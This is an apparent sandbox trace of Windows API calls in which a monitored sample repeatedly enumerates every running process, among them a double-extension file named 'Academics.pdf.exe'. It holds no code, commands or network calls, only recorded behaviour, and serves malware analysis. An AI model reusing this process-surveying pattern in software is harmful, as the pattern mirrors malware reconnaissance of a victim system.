Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0305.938] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0305.938] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0305.939] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0305.940] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0305.941] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0305.942] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0305.943] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0305.944] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0305.944] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0305.945] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0305.946] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0305.947] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0305.948] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0305.949] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0305.949] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0305.950] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0305.951] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0305.951] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0305.952] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.953] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0305.953] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.954] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0305.955] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0305.955] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0305.956] CloseHandle (hObject=0x294) returned 1 [0305.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0305.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0305.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0305.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0305.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0305.956] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0305.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0305.957] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0305.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0305.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0305.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0305.957] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0305.959] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0305.960] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0305.961] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0305.961] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0305.962] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0305.962] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0305.967] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0305.968] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0305.969] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0305.970] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0305.971] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.971] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.972] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.973] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.974] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.975] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0305.975] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.976] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.977] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0305.978] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0305.979] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0305.980] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0305.981] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.982] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0305.982] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0305.983] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0305.984] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0305.985] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0305.986] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0305.987] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0305.987] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0305.988] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0305.989] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0305.990] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0305.991] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0305.992] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0305.992] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0305.993] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0305.994] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0305.995] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0305.996] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0305.997] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0305.997] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0305.998] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0305.999] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0306.000] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0306.001] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0306.002] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0306.003] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0306.004] CloseHandle (hObject=0x294) returned 1 [0306.004] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0306.004] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0306.004] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0306.004] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0306.006] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0306.007] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0306.007] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0306.008] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, 